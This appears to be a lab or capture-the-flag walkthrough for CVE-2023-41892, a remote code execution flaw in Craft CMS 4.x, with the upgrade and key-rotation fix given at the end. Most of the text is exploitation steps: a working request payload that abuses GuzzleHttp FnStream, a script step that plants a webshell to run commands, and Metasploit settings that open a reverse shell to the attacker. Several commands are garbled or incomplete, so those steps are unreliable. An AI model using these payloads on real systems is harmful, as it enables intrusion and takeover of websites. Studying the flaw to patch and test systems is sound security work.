Craft CMS could allow a remote authenticated attacker to execute arbitrary code on the system, caused by a flaw in the Craft installations. By sending a specially crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system.

The vulnerability occurs using a PHP object creation in the `\craft\controllers\ConditionsController` class which allows to run arbitrary PHP code by escalating the object creation calling some methods available in `\GuzzleHttp\Psr7\FnStream`.

Using this vulnerability in combination with The Imagick Extension and MSL which stands for Magick Scripting Language, a full RCE can be achieved. MSL is a built-in ImageMagick language that facilitates the reading of images, performance of image processing tasks, and writing of results back to the filesystem.

This can be leveraged to create a dummy image containing malicious PHP code using the Imagick constructor class delivering a webshell that can be accessed by the attacker, thereby executing the malicious PHP code and gaining access to the system.

Affected Products

  • Craft CMS Craft CMS 4.4.14
  • affected at >= 4.0.0-RC1, <= 4.4.14



Source Code

  • curl

  • curl –i

HTTP headers (Proxy)

Manual (Proxy)

1. You can capture a HTTP request, and modify the data. Make sure the method is correct

  • action=conditions/render&test[userCondition]=craft\elements\conditions\users\UserCondition&config={"name":"test[userCondition]","as xyz":{"class":"\\GuzzleHttp\\Psr7\\FnStream","__construct()":[{"close":null}],"_fn_close":"phpinfo"}}

2. The response should include the phpinfo() data

Exploitation (Script)

1. This vulnerability can be exploited using a script (, download it using git

  • git clone

2. Run (sometimes you need to modify the source code for the webshell to be uploaded to a writable folder)

  • python3 http://surveillance.htb

3. You can also run commands from shell.php (http://surveillance.htb/shell.php?cmd=whoami)

Important: remember to delete this file after your assessment. You can also upload a webshell having already the chance to execute commands.

Exploitation (Metasploit)

1. The exploit (craftcms_unauth_rce_cve_2023_41892) can be used to exploit this vulnerability and get a reverse shell

  • use exploit/linux/http/craftcms_unauth_rce_cve_2023_41892
  • show options

2. Set the options

  • set RHOSTS surveillance.htb
  • set LHOST tun0

3. (OPTIONAL) Modify the port and SSL, in my case the website was using port 80, without SSL

  • set RPORT 80
  • set SSL false

4. (OPTIONAL), set the function to inject our payload

  • set command system

5. Run the exploit

  • run


Upgrade to the latest version of Craft CMS (3.8.15, 4.4.15 or later)

Besides applying the patch rotate the CRAFT_SECURITY_KEY immediately. knowing the key will lead to an unauthenticated RCE on a widely used CraftCMS plugin, and there may be more.